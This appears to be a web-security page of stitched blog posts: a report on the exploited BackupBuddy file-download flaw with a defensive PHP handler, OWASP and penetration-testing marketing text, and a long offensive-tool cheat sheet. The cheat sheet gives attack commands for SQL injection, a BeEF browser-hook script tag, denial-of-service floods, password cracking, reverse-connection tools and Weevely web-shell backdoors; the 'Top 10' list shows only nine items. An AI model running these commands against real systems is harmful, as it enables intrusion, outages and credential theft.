Web Application Security


Latest News From Blog


Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin

Threat actors are exploiting a zero-day vulnerability in a WordPress plugin called BackupBuddy, Wordfence researchers warned.

On September 6, 2022, the Wordfence Threat Intelligence team was informed of a vulnerability being actively exploited in the BackupBuddy WordPress plugin. This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and media files.

The vulnerability, tracked as CVE-2022-31474 (CVSS score: 7.5), can be exploited by an unauthenticated user to download arbitrary files from the affected site. The plugin is estimated to have around 140,000 active installations.

Wordfence researchers determined that threat actors started exploiting this vulnerability in the wild on August 26, 2022. The security firm also said it has blocked 4,948,926 attacks exploiting this vulnerability since that time. The attackers were attempting to retrieve sensitive files such as /wp-config.php and /etc/passwd.

The vulnerability affects versions 8.5.8.0 to 8.7.4.1 and was fixed with the release of version 8.7.5 on September 2, 2022.

The plugin allows storing backup files in multiple locations (Destinations), including Google Drive, OneDrive, and AWS. It also allows storing backups via the ‘Local Directory Copy’ option, but experts discovered that this feature isn’t secure and allows unauthenticated users to download any file stored on the server.

“More specifically the plugin registers an admin_init hook for the function intended to download local back-up files and the function itself did not have any capability checks nor any nonce validation. This means that the function could be triggered via any administrative page, including those that can be called without authentication (admin-post.php), making it possible for unauthenticated users to call the function,” reads the report. “The back-up path is not validated and therefore an arbitrary file could be supplied and subsequently downloaded.”

Wordfence added: “Due to this vulnerability being actively exploited, and its ease of exploitation, we are sharing minimal details about this vulnerability.” The firm did not share additional details about the flaw because it is easy to exploit.
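The report names three missing controls: a capability check, nonce validation and validation of the requested path. The handler below is an added example written for this page, not BackupBuddy's code or its fix; the action name, option and backup directory are assumed, and it shows how a WordPress plugin can apply all three before serving a local backup.

```php
<?php
// Added example (not BackupBuddy's code): a WordPress download handler that
// applies the three controls the Wordfence report says were missing.
// Assumptions: it runs inside a plugin, backups live in a fixed directory
// under wp-content, and the request carries a nonce minted for 'example_download'.

define( 'EXAMPLE_BACKUP_DIR', WP_CONTENT_DIR . '/example-backups' );

// Hook a dedicated admin-post action instead of admin_init: admin_post_{action}
// only fires for logged-in users, and admin_post_nopriv_{action} is deliberately
// not registered, so unauthenticated calls to admin-post.php never reach it.
add_action( 'admin_post_example_download', 'example_handle_backup_download' );

function example_handle_backup_download() {
    // 1. Capability check: only administrators may fetch backups.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. Nonce validation: dies if the _wpnonce parameter is missing or stale.
    check_admin_referer( 'example_download' );

    // 3. Path validation: the request names a file, never a path.
    $requested = isset( $_GET['file'] ) ? wp_unslash( $_GET['file'] ) : '';
    $path      = example_resolve_backup_path( $requested );
    if ( false === $path ) {
        wp_die( 'Invalid backup file.', '', array( 'response' => 400 ) );
    }

    header( 'Content-Type: application/zip' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}

/**
 * Map a user-supplied name to a file inside EXAMPLE_BACKUP_DIR, or return
 * false. Rejects directory separators, traversal, symlinks that escape the
 * directory, and anything that is not a .zip archive.
 */
function example_resolve_backup_path( $name ) {
    $name = sanitize_file_name( $name ); // strips separators and odd bytes
    if ( '' === $name || $name !== basename( $name ) ) {
        return false;
    }
    if ( 'zip' !== strtolower( pathinfo( $name, PATHINFO_EXTENSION ) ) ) {
        return false;
    }

    $base = realpath( EXAMPLE_BACKUP_DIR );
    $real = realpath( EXAMPLE_BACKUP_DIR . '/' . $name );
    if ( false === $base || false === $real ) {
        return false; // directory or file does not exist
    }
    // realpath() has resolved symlinks, so a prefix check proves containment.
    if ( 0 !== strpos( $real, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }
    return $real;
}
```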


Most common web security vulnerabilities!

OWASP, the Open Web Application Security Project, is a non-profit charitable organization focused on improving the security of software and web applications. The organization publishes a list of top web security vulnerabilities based on data from various security organizations. The vulnerabilities are prioritized by exploitability, detectability and impact on software.

Exploitability - What is needed to exploit the security vulnerability? Exploitability is highest when the attack needs only a web browser and lowest when it needs advanced programming and tools.

Detectability - How easy is it to detect the threat? Detectability is highest when the information is displayed in a URL, form or error message and lowest when it is only visible in source code.

Impact or Damage - How much damage will be done if the security vulnerability is exposed or attacked? Impact is highest for a complete system crash and lowest when nothing happens at all.

The main aim of the OWASP Top 10 is to educate developers, designers, managers, architects and organizations about the most important security vulnerabilities.

The Top 10 security vulnerabilities as per the OWASP Top 10 are:
i. SQL Injection
ii. Cross Site Scripting
iii. Broken Authentication and Session Management
iv. Insecure Direct Object References
v. Cross Site Request Forgery
vi. Security Misconfiguration
vii. Insecure Cryptographic Storage
viii. Failure to Restrict URL Access
ix. Insufficient Transport Layer Protection


What is Penetration Testing and How Does It Work?

Penetration testing is also called pen-testing. Basically, it is a testing method used to enhance the security of an application. This method simulates various attacks that may threaten your business application. Hence, to protect a business from unwanted hacks and enhance its security, penetration testing is used. So here we will get to know about penetration testing tools and techniques.

QAble is one of the renowned penetration testing companies in India & USA, and we follow the best penetration testing techniques to meet the requirement. As we know, the security of an application matters the most, and through smart penetration testing tools we simulate possible attacks. Further, our team assures the robustness of an application by analyzing whether it is able to resist the attack or not. If you are looking to strengthen your application, we have the best team so far. Hence, hire the best QA tester in India to enhance the security protocol of the app.

Do you know about network penetration testing?

Network penetration testing simulates activities that a hacker may use to exploit your network. Here, the testers perform pen-testing without malicious intent. Also, to strengthen the network, professionals are given complete authority so that they can take action as and when needed. They are also required to keep management in the loop for every action and reaction. Moreover, if the experts take this testing lightly, there will be serious consequences, and it could be the end of the business.

What are the types of penetration testing?

To expose the vulnerabilities within the system, penetration testing is a must. Here we will discuss the various types of penetration testing that will increase the pace of your search. Also, we have seen testers confused about how to initiate penetration testing. Knowing the specific methods of penetration testing will help you take the right decision for the security of the system. So let’s explore different types of pen testing:

External Network Penetration Testing:
Under this testing method, the team analyzes the public information available. They try to leverage the permeability of an online product by accessing public information, such as email addresses, the company’s website link, and other external links. In external network pen testing, the expert will try to breach the firewall using the public data. Further, they use OSINT (open-source intelligence) and internally built tools in order to hack the password. Hence, following this testing method becomes mandatory because it reduces the potential network risks.

Internal Network Penetration Testing:
Through this pen testing method, the internal vulnerabilities are highlighted. As we know, applications are developed with various roles and rights, so here the rights given to team members are cross-verified. Suppose in a business application, employees are given some access in order to utilize the services. At the same time, we need to check whether, using that access, an employee could hack the entire system. This examination comes under internal network penetration testing.

Physical Penetration Testing:
Phishing emails are the best example for understanding the social engineering pen testing method. The method takes an effort to gain the trust of a team member by confusing them into sharing personal information. In this method, a hacker behaves as a manager and asks the team member to share some crucial information and transfer funds urgently. Their intent is to exploit the employee and force him to reveal the data.

Wireless Penetration Testing:
We have seen many corporations whose security was breached over wireless. It is sad but true: nowadays so many tools are available online through which hackers can grasp information. And we know that without the internet a company cannot survive. Hence, through wireless pen testing, we make sure the Wi-Fi connection and other involved devices are secured from unwanted hacks. As technology advances, negative powers are also improving. So, now there is a need to manage all your sources smartly.

Conclusion:
So far we have discussed penetration testing. Here at QAble we are offering excellent penetration testing services in order to offer a secure application experience. Further, using dedicated penetration tools we simulate the system’s vulnerabilities and take the required action. Hence, if you are looking for quality penetration testing services, we are your exclusive service partner.


Why Is Penetration Testing Important For Your Website?

We often see news headlines about security breaches in big companies and the losses such breaches amount to. In today's world, hackers have advanced tools and techniques to identify even the smallest vulnerabilities in a company’s internet-facing application. They exploit these vulnerabilities to compromise the security of a system. What’s even worse is that IT teams or network admins often identify the attack after it’s too late. And that’s exactly where penetration testing comes in.

What Is Penetration Testing?

Penetration testing or pentesting is a popular security practice. As we mentioned earlier, hackers look for vulnerabilities in an application or a network which they can exploit. The purpose of a penetration test is to identify these vulnerabilities before hackers do and patch them up on time. Pentesting involves a team of ethical hackers attempting to infiltrate all the security defenses and gain access to the application.

Penetration testing is different from a vulnerability assessment scan. A vulnerability assessment will only give you a list of vulnerabilities. On the other hand, a penetration test will list out the vulnerabilities, their severity, and all possible fixes for them. Moreover, penetration tests usually comprise both human and automated tests. All this makes penetration testing a superior and efficient security practice.

Why Is Penetration Testing Required?

Penetration testing is popular for good reason. You can reap so many benefits from performing pentests regularly. It truly is an asset to your security system. So, let’s get right into the various benefits of penetration tests:

1. Allows you to fix vulnerabilities
Penetration testing uncovers even the smallest vulnerabilities in your application. Moreover, the vulnerabilities found will be classified into low risk, medium risk, and high risk. Using this information, you can prioritize the vulnerabilities and allot resources accordingly. Fixing these vulnerabilities will strengthen and reinforce the existing security system and strategy. Moreover, it gives you an opportunity to fix issues you didn’t know existed in your IT infrastructure. We are also seeing a lot of traction for Smart Contract Audit as blockchain technology is rising. Furthermore, pentesters also reveal the damage that can occur if a hacker were to exploit the vulnerabilities. Knowing this can help you prepare for a cyberattack accordingly. Lastly, most penetration testers like Astra provide assistance with fixing the loopholes they found. After a pentest, you are likely to receive a comprehensive report with all the information you need.

2. Protects your business from potential attacks
According to CNBC, hackers target small businesses 43% of the time, while just 14% of them are prepared to defend themselves. However, by conducting penetration tests, you can always stay a step ahead of hackers. You can shut all possible entries to your system and keep intruders out of your business.

3. Data protection
Sensitive data falling into the wrong hands is every business owner's worst nightmare. Indeed, it can take a massive toll on the business itself, from which it may never recover. Penetration tests can safeguard data by preventing any possible attack. For this reason, performing a penetration test is an absolute necessity.

4. Compliance with security regulations and laws
Penetration testing helps you with the requirements of PCI-DSS, GDPR, HIPAA, ISO-27001, etc. These are data compliance laws introduced by various governments and organizations in order to protect data. If a business is not compliant with these regulations, it will be subjected to severe ramifications in the form of hefty fines and bans.

If a successful cyberattack were to take place, the company has to pay fines and compensation. Furthermore, they will have to spend a very significant amount of money fixing the damage caused by the attack. They will also have to spend money upgrading the existing security system, seeing as it wasn’t very effective in keeping hackers out. Moreover, when a cyberattack occurs, all activities will cease, costing the business a lot of money. According to Cybersecurity Ventures, global cybercrime costs will hit $6 trillion annually by 2021. Here are some of the types of attacks you can face and the average cost of dealing with them:

Ransomware attack - $133,000 per year
Malware attack - $2.6 million per year
Data breaches - $3.92 million per year
Phishing - $17,700 per minute

For better protection, it is always recommended to audit your cloud infrastructure too, to ensure that all ports are secured, data is encrypted and best security practices are followed.

Conclusion

Routine penetration testing should really be a priority if you are a website owner. It can reduce the chances of receiving a cyberattack by a huge margin. Ideally, this itself is reason enough to start conducting penetration tests.


Tools for Penetration Testing

While producing high-technology mobile apps and websites, there is no way around security issues. That is why there are many top-notch pentest tools for handling multiple workflows that allow detection, elimination and prevention of web security attacks.

What is Penetration Testing?

The idea behind any penetration testing is to identify security-related vulnerabilities in a software application by conducting a security attack to determine how much damage a hacker may cause when trying to hack the product. The results of this practice help to make applications and software more secure, robust, and unbreakable, and the users’ experience more successful. So, if you are going to develop and use any software for your business, the automated penetration testing method will help you check network security threats.

How Penetration Tests Work

Penetration testing is a simulated real-time cyber-attack conducted by certified security professionals (hackers) under secure conditions to detect gaps, glitches, vulnerabilities, loopholes, misconfigurations, etc. that are susceptible to further malicious code injections, malware, unauthorized entries, attacks, etc. Application testers then try to exploit these vulnerabilities, typically by stealing data, escalating privileges, intercepting traffic, etc., to understand the nature of the damage they may cause. However, it is hard to find all possible vulnerabilities using automated tools. There are some threats that can only be identified by manual system scans.

To uncover the security vulnerabilities which can be found in any type of web application, there are three major test types:
Black Box Testing;
White Box Testing;
Gray Box Testing.

Black box testing: A black box assessment is mostly performed without any knowledge of the system’s internals. Here testers check out the system solely from the outside. They have no idea of what is happening within the system to generate responses and test actions.

White box testing: In a white box assessment, the testers have the fullest and most complete internal knowledge of the system that is being tested (design docs, source code, etc.).

Gray box testing: Gray box testing is another application security test technique that is a mix of both white box and black box testing.

Best Penetration Testing Tools

01. Database Tools

sqlmap: automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
  sqlmap -u victim_url
  sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v3

02. CMS Scanning Tools

WPScan:
  wpscan --version
  wpscan -u "URL of webpage"

Joomscan:
  joomscan -h
  joomscan --version
  joomscan /?
  joomscan -u victim_url

03. SSL Scanning Tools

TLSSLed:
  tlssled URL port

w3af (web application attack and audit framework):
  start w3af, enter the URL of the target, and start the scan.

04. Metasploit

  msfupdate
  msf > search name:Microsoft type:exploit

Armitage: GUI for Metasploit.

BeEF:
  beef-xss
  username and password: beef
  <script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>

Linux Exploit Suggester:
  root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

p0f: identifies the operating system of a target host simply by examining captured packets. In the hands of advanced users, p0f can detect firewall presence, NAT use, and the existence of load balancers.
  p0f --version
  p0f -h
  p0f -i eth0 -p -o filename
  open 192.168.1.2

pdf-parser: parses a PDF document to identify the fundamental elements used in the analyzed PDF.
  pdf-parser -o 10 filepath

dumpzilla: extracts all forensically interesting information from Firefox, Iceweasel, and Seamonkey browsers.

ddrescue: copies data from one file or block device (hard disc, CD-ROM, etc.) to another, trying to rescue the good parts first in case of read errors.
  dd_rescue infilepath outfilepath
  dd_rescue -v /dev/sdb ~/sec.img

DFF:
  dff-gui

Social Engineering

Social Engineering Toolkit:
  sudo apt install sendmail
  vim config/set_config   # change the SENDMAIL=OFF flag to SENDMAIL=ON

05. Stressing Tools

Used for DoS attacks or to create a stress test for different applications so as to take appropriate measures for the future.

Slowhttptest:
  slowhttptest --version
  slowhttptest -h
  # sample
  slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2
Where:
  -c 500 = 500 connections
  -H = Slowloris mode
  -g = generate statistics
  -o outputfile = output file name
  -i 10 = use 10 seconds to wait for data
  -r 200 = 200 connections with
  -t GET = GET requests
  -u http://192.168.1.202/index.php = target URL
  -x 24 = maximum length of 24 bytes
  -p 2 = 2-second timeout

Inviteflood: SIP/SDP INVITE message flooding over UDP/IP.
  inviteflood --version
  # format
  inviteflood eth0 target_extension target_domain target_ip number_of_packets
  # sample
  inviteflood eth0 2000 192.168.x.x 192.168.x.x 1
Where:
  target_extension is 2000
  target_domain is 192.168.x.x
  target_ip is 192.168.x.x
  number_of_packets is 1
  -a is the alias of the SIP account

Iaxflood: VoIP DoS tool.
  iaxflood --version
  iaxflood -h
  iaxflood sourcename destinationname numpackets
  iaxflood ip_src ip_dest packets

thc-ssl-dos: verifies the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client.
  # format
  thc-ssl-dos victimIP httpsport --accept
  # example
  thc-ssl-dos 192.168.1.1 443 --accept

06. Sniffing & Spoofing

Burpsuite: the sniffing tool between your browser and the web servers, used to find the parameters that the web application uses.

mitmproxy: SSL-capable man-in-the-middle HTTP proxy.
  mitmproxy --version
  mitmproxy -h
  mitmproxy -p portnumber
  mitmproxy -p 80

07. Wireshark

sslstrip: MITM attack that forces a victim's browser to communicate in plain text over HTTP.
  sslstrip --version
  sslstrip -h
  sslstrip -p 80

08. Password Cracking Tools

Hydra: login cracker that supports many protocols.
  hydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V

Johnny: GUI for the John the Ripper password cracking tool.

John: CLI for the Johnny GUI.
  unshadow passwd shadow > unshadowed.txt

Rainbowcrack: cracks hashes by rainbow table lookup.
  rcrack -h
  rcrack path_to_rainbow_tables -f path_to_password_hash
  ./rcrack . -h 5d41402abc4b2a76b9719d911017c592
  ./rcrack . -l hash.txt

09. SQLdict: dictionary attack tool for SQL Server.
  sqldict
  Fill in “Target IP Server”; under “Target Account”, enter the username; load the file with the passwords; start.

hash-identifier: identifies types of hashes.
  hash-identifier 5d41402abc4b2a76b9719d911017c592

10. Maintaining Access

Used to maintain a connection and access to a hacked machine even when it connects and disconnects again.

Powersploit: helps to connect with the victim’s machine via PowerShell.
  cd /usr/share/powersploit/

Sbd: similar to Netcat; features AES-CBC-128 + HMAC-SHA1 encryption.
  # server
  sbd -l -p 44
  # victim
  sbd 192.168.43.2 44

Weevely: PHP web shell that simulates a telnet-like connection; used as a stealth backdoor.
  # check
  weevely -h
  # format
  weevely generate password pathoffile
  # sample
  weevely generate adm1n123 ~/Desktop/about1.php
  # format
  weevely URL password
  # sample
  weevely http://198.168.32.13 adm1n123

http-tunnel: creates a bidirectional virtual data stream tunneled in HTTP requests. This can be useful for users behind restrictive firewalls.
  # server
  httptunnel_server -h
  # client
  httptunnel_client -h

cryptcat: similar to Netcat; allows making TCP and UDP connections with a victim’s machine in an encrypted way.
  # server
  cryptcat -l -p port -n
  # client
  cryptcat IPofServer PortofServer

11. Reverse Engineering

OllyDbg: 32-bit assembler-level analyzing debugger for MS Windows applications; used to crack commercial software.
  start ollydbg

dex2jar: converts an APK file (Android) to a JAR file in order to view the source code.
  d2j-dex2jar -d /file location
  d2j-dex2jar -d ~/Desktop/class.dex

jd-gui: standalone graphical utility that displays Java source code of “.class” files.
  jd-gui

apktool: one of the best tools to reverse a whole Android application.
  apktool
  # decompile
  apktool d apk_file

12. Reporting Tools

Dradis:
  service dradis start
  dradis
  open https://machine_ip:3004
  import files from NMAP, NESSUS, NEXPOSE

Metagoofil: searches Google to identify and download documents to the local disk and then extracts the metadata.
  # help
  metagoofil -h
  metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res
  -d (domain name)
  -t (file type to download: docx, pdf, etc.)
  -l (limit the results: 10, 100)
  -n (limit files to download)
  -o (location to save the files)
  -f (output file)

Misc

strace:
  # sample
  strace -e trace=network,read,write /path/to/app args
  # example
  strace -e trace=network,read,write customapp
